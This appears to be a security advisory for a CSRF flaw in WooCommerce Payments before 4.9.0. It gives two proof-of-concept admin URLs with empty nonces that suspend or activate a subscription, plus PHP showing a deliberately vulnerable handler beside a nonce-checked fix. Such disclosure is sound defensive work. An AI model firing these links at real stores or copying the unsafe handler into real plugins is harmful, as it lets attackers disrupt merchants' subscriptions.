wpvulndb WPVDB-ID: 7E4C0059-F8A7-4421-B906-1A6A801AEF2A
History: Sep 11, 2023 - 12:00 a.m.

WooCommerce Payments < 4.9.0 - Subscription Suspension/Activation via CSRF

2023-09-11 00:00:00
wpscan.com
Tags: woocommerce, payments, subscription, csrf, vulnerability, attack, admin

AI Score: 7.1 High (Confidence: High)

Description: The plugin does not perform a CSRF (nonce) check when suspending or activating subscriptions. An attacker who can get a logged-in admin to open a crafted link can make that admin suspend or activate arbitrary subscriptions via a CSRF attack.

PoC

Deactivate subscription with ID 53:
https://example.com/wp-admin/edit.php?s=&post_status=all&post_type=shop_subscription&_wpnonce=&_wp_http_referer=&action=on-hold&m=0&_wcs_product=&_payment_method=&_customer_user=&paged=1&post[]=53&action2=on-hold

Activate subscription with ID 53:
https://example.com/wp-admin/edit.php?post_type=shop_subscription&marked_on-hold=1&changed=1&ids=53&post=53&_wpnonce=&action=active

Note that `_wpnonce` is empty in both URLs: the request is accepted on the strength of the admin's session cookie alone.
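The missing check, as an added example that is not WooCommerce Payments code: a hypothetical admin handler for the subscription status change in its vulnerable shape (no nonce check) beside a hardened shape that verifies a WordPress nonce with `check_admin_referer()` and a capability before acting. The `example_*` function names, the `admin_init` hook and the `wc-` post-status prefix are assumptions for illustration.

```php
<?php
// Added example (not the plugin's own code). A hypothetical handler that
// changes a subscription's status from a GET request shaped like the PoC:
//   edit.php?post_type=shop_subscription&post=53&action=active&_wpnonce=
// Function names, hook and status storage are assumptions.

// Assumed helper: performs the transition (WC-style post_status prefix).
function example_set_subscription_status( $subscription_id, $new_status ) {
    return wp_update_post( array( 'ID' => $subscription_id, 'post_status' => 'wc-' . $new_status ) );
}

// Vulnerable shape: acts as soon as the request arrives with an admin's
// cookies. A cross-site link or form the admin opens is enough.
function example_handle_status_change_unsafe() {
    if ( empty( $_GET['post'] ) || empty( $_GET['action'] ) ) {
        return;
    }
    example_set_subscription_status( absint( $_GET['post'] ), sanitize_key( $_GET['action'] ) );
}

// Hardened shape: the request must carry a nonce minted for this action
// and this user's session, and the user must be allowed to edit the post.
function example_handle_status_change_safe() {
    if ( empty( $_GET['post'] ) || empty( $_GET['action'] ) ) {
        return;
    }
    $subscription_id = absint( $_GET['post'] );
    $new_status      = sanitize_key( $_GET['action'] );

    if ( ! in_array( $new_status, array( 'active', 'on-hold' ), true ) ) {
        return; // Only the two transitions this handler owns.
    }
    // Reads $_REQUEST['_wpnonce'] and dies when it is missing or empty (as in
    // the PoC URLs), expired, or minted for a different action or user.
    check_admin_referer( 'example_subscription_status_' . $subscription_id );

    if ( ! current_user_can( 'edit_post', $subscription_id ) ) {
        wp_die( esc_html__( 'You are not allowed to change this subscription.' ), 403 );
    }
    example_set_subscription_status( $subscription_id, $new_status );
}

// Legitimate links must be generated with the matching nonce, so the
// action string here has to equal the one checked above.
function example_status_change_link( $subscription_id, $new_status ) {
    $args = array( 'post_type' => 'shop_subscription', 'post' => $subscription_id, 'action' => $new_status );
    $url  = add_query_arg( $args, admin_url( 'edit.php' ) );
    return wp_nonce_url( $url, 'example_subscription_status_' . $subscription_id );
}

add_action( 'admin_init', 'example_handle_status_change_safe' );
```

The nonce check is the fix the advisory implies; the capability check is the usual companion so that a user who can reach the handler but not edit the post is also refused.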

CPE Name    Operator    Version
            eq          4.9.0
